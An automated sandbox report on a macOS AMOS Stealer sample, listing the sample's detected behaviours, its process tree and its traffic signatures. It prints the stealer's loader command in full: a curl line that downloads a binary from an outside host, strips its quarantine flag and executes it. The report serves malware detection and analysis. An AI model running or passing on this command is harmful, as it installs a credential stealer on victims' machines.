macOS
Analysis Report
Overview
Detection
AMOS Stealer
Score: | 60 |
Range: | 0 - 100 |
Whitelisted: | false |
Signatures
Detected AMOS Stealer
Executes Apple scripts with very long statement arguments
Executes the "csrutil" command used to retrieve or modify the "System Integrity Protection" configuration
Executes the "dscl" command with authonly argument (probably to verify the login password)
Executes Apple scripts and/or other OSA language scripts with shell command 'osascript'
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Executes the "kill" or "pkill" command typically used to terminate processes
Executes the "mkdir" command used to create folders
Executes the "system_profiler" command used to collect detailed system hardware and software information
Reads file resource fork extended attributes
Reads hardware related sysctl values
Reads the sysctl hardware model value (potentially used for VM-detection)
Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)
Reads the systems OS release and/or type
Reads the systems hostname
Uses AppleScript framework/components containing Apple Script related functionalities
Uses AppleScript scripting additions containing additional functionalities for Apple Scripts
Writes FAT Mach-O files to disk
Writes Mach-O files to the tmp directory
Classification
Joe Sandbox version: | 42.0.0 Malachite |
Analysis ID: | 1594700 |
Start date and time: | 2025-01-19 20:30:45 +01:00 |
Joe Sandbox product: | CloudBasic |
Overall analysis duration: | 0h 4m 8s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Cookbook file name: | defaultmaccmdlinecookbook.jbs |
Analysis system description: | Virtual Machine, Mojave (Office 16 16.27, Java 11.0.2+9, Adobe Reader 2019.010.20099) |
macOS major version: | 10.14 |
CPU architecture: | x86_64 |
Analysis Mode: | default |
Detection: | MAL |
Classification: | mal60.spyw.evad.mac@0/4@2/0 |
- Excluded IPs from analysis (whitelisted): 17.253.119.202, 17.253.119.201, 23.222.201.219, 17.253.21.204, 17.253.21.205, 17.36.200.79, 23.220.136.24
- Excluded domains from analysis (whitelisted): mesu-cdn.apple.com.akadns.net, e11408.d.akamaiedge.net, lcdn-locator-usuqo.apple.com.akadns.net, updates.cdn-apple.com.akadns.net, gateway.icloud.com, e673.dsce9.akamaiedge.net, help-ar.apple.com.edgekey.net, crl.apple.com, lb._dns-sd._udp.0.11.168.192.in-addr.arpa, mesu-cdn.origin-apple.com.akadns.net, lcdn-locator.apple.com.akadns.net, help.origin-apple.com.akadns.net, lcdn-locator.apple.com, mesu.g.aaplimg.com, updates.g.aaplimg.com, itunes.apple.com.edgekey.net, help.apple.com, mesu.apple.com, init.itunes.apple.com, updates.cdn-apple.com, init-cdn.itunes-apple.com.akadns.net
- Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
- VT rate limit hit for: norikosumiya.com
Command: | /bin/sh -c "curl -o /tmp/update https:/norikosumiya.com/brew/update && xattr -c /tmp/update && chmod +x /tmp/update && /tmp/update" |
PID: | 615 |
Exit Code: | 0 |
Exit Code Info: | |
Killed: | False |
Standard Output: | |
Standard Error: | % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 0 229k 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0 87 229k 87 199k 0 0 94252 0 0:00:02 0:00:02 --:--:-- 94221 100 229k 100 229k 0 0 105k 0 0:00:02 0:00:02 --:--:-- 105k sh: line 0: disown: current: no such job |
- System is macvm-mojave
- xpcproxy New Fork (PID: 610, Parent: 1)
- mono-sgen32 New Fork (PID: 615, Parent: 537)
- sh New Fork (PID: 616, Parent: 615)
- sh New Fork (PID: 618, Parent: 615)
- sh New Fork (PID: 619, Parent: 615)
- sh New Fork (PID: 620, Parent: 615)
- sh New Fork (PID: 623, Parent: 620)
- sh New Fork (PID: 624, Parent: 623)
- osascript New Fork (PID: 625, Parent: 624)
- osascript New Fork (PID: 626, Parent: 624)
- system_profiler New Fork (PID: 627, Parent: 626)
- csrutil New Fork (PID: 628, Parent: 627)
- system_profiler New Fork (PID: 629, Parent: 626)
- system_profiler New Fork (PID: 630, Parent: 626)
- osascript New Fork (PID: 631, Parent: 624)
- osascript New Fork (PID: 632, Parent: 624)
- xpcproxy New Fork (PID: 634, Parent: 1)
- xpcproxy New Fork (PID: 653, Parent: 1)
- cleanup
⊘No yara matches
⊘No Suricata rule has matched
- • Compliance
- • Networking
- • System Summary
- • Persistence and Installation Behavior
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Stealing of Sensitive Information
Click to jump to signature section
Show All Signature Results
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | TCP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | HTTP traffic detected: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | Reads from socket in process: | Jump to behavior |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | Writes from socket in process: | Jump to behavior |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Classification label: |
Persistence and Installation Behavior |
---|
Source: | Osascript command executed: |